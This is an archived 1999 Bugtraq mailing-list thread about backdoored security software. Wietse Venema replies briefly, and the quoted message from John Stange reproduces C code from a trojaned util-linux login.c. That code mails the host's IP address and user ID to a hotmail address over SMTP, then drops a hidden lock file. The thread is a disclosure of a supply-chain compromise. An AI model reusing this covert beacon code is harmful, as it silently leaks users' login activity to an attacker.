Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999_1

Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: backdoored tcp wrapper source code

Re: backdoored tcp wrapper source code

Wietse Venema (wietsePORCUPINE.ORG)
Sun, 24 Jan 1999 00:05:16 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: KuRuPTioN: "SSH 1.x and 2.x Daemon"
Previous message: Alan Cox: "Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race"
In reply to: John Stange: "Re: backdoored tcp wrapper source code"
Next in thread: John Stange: "Re: backdoored tcp wrapper source code"

login-utils is notpart of my FTP archive.

        Wietse

John Stange:
> You may want to have a thorough look at everything you've got... I grabbed
> a copy of util-linux2.9g (admittedly being a bad boy and not checking
> against anything), and while I don't have a pristine copy of the source
> on hand to check, I'm guessing that sendmail and a hotmail address is not
> standard behavior for /bin/login:
>
> (from login-utils/login.c)
>
>                he = gethostbyname("mail.hotmail.com");
>                 if (!he) exit(0);
>                 ia = (struct in_addr *)he->h_addr_list[0];
>                 l = sizeof(sai);memset(&sai,0,l);
>                 sai.sin_port = htons(25);
>                 sai.sin_addr.s_addr = ia->s_addr;
>                 if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
>                 if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
>                 if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0)
> exit(0);
>                 sprintf(b,"\r\nHost = %s\r\nUid =
> %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
>                 sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
>                 sleep(1);if (write(s,"MAIL FROM:<xulhotmail.com>\n",28) <
> 0) exit(0);
>                 if (write(s,"RCPT TO:<wlogainhotmail.com>\n",30) < 0)
> exit(0);
>                 sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
>                 sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
>                 sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
>                 sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
> etc etc
>
> I'm in a bit of a hurry, so I haven't had a chance to comb anything
> else...
>
> > TCP Wrappers is a widely-used security tool to protect UNIX systems
> > against intrusion. In has an estimated installed base of millions.
> >
> > Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
> > a backdoored version. Eventually this was bound to happen, and
> > that's why the source file is accompanied by a PGP signature.  But
> > that is no guarantee against people downloading and installing
> > backdoored software.
>
> -- John Stange
> Staff World, 4120 AVW
> x52720
>
>
>
>

Next message: KuRuPTioN: "SSH 1.x and 2.x Daemon"
Previous message: Alan Cox: "Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race"
In reply to: John Stange: "Re: backdoored tcp wrapper source code"
Next in thread: John Stange: "Re: backdoored tcp wrapper source code"